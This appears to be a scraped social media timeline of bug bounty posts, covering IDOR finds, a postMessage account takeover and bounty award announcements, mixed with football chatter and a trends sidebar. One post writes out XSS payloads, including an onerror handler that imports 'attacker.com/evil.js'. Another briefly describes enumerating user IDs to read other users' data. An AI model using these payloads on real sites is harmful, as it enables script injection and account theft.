Bounty : 1500$ Bug : IDOR well i got endpoint where i can see other user information , but it is not supposed to leak much information and the JSON was long . Just searched @ on response and got user mail then tried changing UserID and saw multiple user details
1-click ATO via a postMessage flaw This is my 2nd ever finding and I’m really happy about it! The severity could be high, but I’m not letting that overshadow the joy of this bounty 😄 Huge thanks to @voorivex for teaching us this trick 🙌
I was awarded a $3,100 bounty on @Hacker0x01! hackerone.com/exploitmsf #TogetherWeHitHarder
Yay, I was awarded a $3,000 bounty on @Hacker0x01! hackerone.com/artsec #TogetherWeHitHarder I'm about to break my record for bounty amount in 1 month 🫣
The record for most goals scored after turning 30 in football history is held by Ronnie Rooke with 493. Cristiano Ronaldo has 486 as of now, just 7 away.
🚨 Cristiano Ronaldo is only 7 goals away from being the top scorer in HISTORY after turning 30
bugTricks# Top Tier Bug Hunter Mindset <img src=x onerror=alert(1)> --> don't report P3 Medium bug <img src=x onerror=import("attacker.com/evil.js")> -> P1/P2 Critical/High Bug
When you’re counting on that one triaged report to pay the rent, and it turns out to be an internal duplicate 💀 #BugBounty
In the past weeks, I have managed to reliably bypass Denuvo in Black Myth: Wukong with the help of Sogen and other techniques. Finally, I can move on and focus on new projects 😂
I love developers when they put long UUID and think they are secure, they kept making same mistakes over and over Meanwhile wayback urls leaking all sensitive data related to organisation without auth #bugbounty #bugbountytips
Triaged
New IDOR vulnerability reported! Found an issue that allowed unauthorized user removal across organizations
28 goals in 18 games, 😭😭😭 fakest footballer ever
50 Days of Hacking Without Bad Habits & Noise ❌ 🚭🍻💃❌ 43 Days, 7 More to go! 🎉 Traveled to my hometown, caught up on some much needed sleep, then solved few labs. No pentesting this weekend, just labs and relaxation
Yes, I was awarded a $3,000 bounty on @Hacker0x01! hackerone.com/encryptsaan123 #TogetherWeHitHarder
Just got a reward for a vulnerability submitted on @yeswehack -- Business Logic Errors (CWE-840).
The bounty was small since the bug only impacted a few accounts.
Yay, I was awarded a $5,750 bounty on @Hacker0x01! hackerone.com/mosec9 #TogetherWeHitHarder
United States Trends
- 1. Pond 241K posts
- 2. Daboll 36.4K posts
- 3. Veterans Day 21.9K posts
- 4. Jimmy Olsen 2,649 posts
- 5. Schoen 19K posts
- 6. Go Birds 12.7K posts
- 7. Zendaya 9,917 posts
- 8. #OTGala8 94K posts
- 9. Downshift N/A
- 10. #jimromeonx N/A
- 11. McRib 1,264 posts
- 12. Hanoi Jane 1,401 posts
- 13. American Vandal 1,493 posts
- 14. Biker 3,934 posts
- 15. Gorilla Grodd 1,368 posts
- 16. Johnny Carson N/A
- 17. Giants 70.5K posts
- 18. #FlyEaglesFly 5,648 posts
- 19. $UNI 2,187 posts
- 20. Joe Dirt N/A
Something went wrong.
Something went wrong.